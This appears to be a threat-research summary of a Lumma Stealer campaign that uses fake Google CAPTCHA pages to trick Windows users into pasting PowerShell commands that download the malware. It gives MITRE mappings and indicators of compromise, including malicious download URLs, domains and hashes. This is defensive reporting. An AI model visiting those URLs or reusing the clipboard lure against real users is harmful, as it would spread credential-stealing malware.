Threat Research

Revealing the Threat: Lumma Stealer Malware Takes Advantage of Fake CAPTCHA Pages | CloudSEK

Securonix

A new method distributes Lumma Stealer via deceptive fake Google CAPTCHA pages that trigger PowerShell to download malware. The campaign uses CDNs and Amazon S3-hosted pages, with clipboard manipulation and base64 encoding to evade detection. hashtags: #LummaStealer #FakeCaptcha #PowerShell #CDN #AmazonS3 #Clipboard #Base64Encoding

Keypoints

  • Windows users are targeted through deceptive human verification pages.
  • The deception relies on fake Google CAPTCHA prompts to entice user interaction.
  • PowerShell commands are used to download Lumma Stealer from remote servers.
  • Malicious sites are hosted on CDNs and Amazon S3, spreading the payload.
  • Clipboard manipulation and base64 encoding are used to evade detection.
  • Recommended mitigations include user education and robust endpoint protection.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – PowerShell commands are executed to download Lumma Stealer. “PowerShell commands executed to download Lumma Stealer.”
  • [T1566] Phishing – Fake Google CAPTCHA pages lure users into executing malicious commands. “Fake Google CAPTCHA pages used to lure users into executing malicious commands.”
  • [T1105] Remote File Copy – Downloading Lumma Stealer from remote servers using PowerShell. “Downloading Lumma Stealer from remote servers using PowerShell.”
  • [T1115] Clipboard Data Manipulation – Copying malicious PowerShell commands to the clipboard via user interaction. “Copying malicious PowerShell commands to the clipboard via user interaction.”

Indicators of Compromise

  • [IP Address] Downloader Server IP – 165.227.121.41
  • [Domain] Malicious hosting domains – heroic-genie-2b372e.netlify.app, fipydslaongos.b-cdn.net
  • [File hash] Lumma Stealer payload hashes – 7c348f51d383d6587e2beac5ff79bef2e66c31d7, e002696bb7d57315b352844cebc031e18e89f29e
  • [File name] Payload artifact – dengo.zip
  • [URL] Malicious resource URLs – http://165.227.121.41/a.txt, https://downcheck.nyc3[.]cdn[.]digitaloceanspaces.com/dengo.zip

Read more: https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint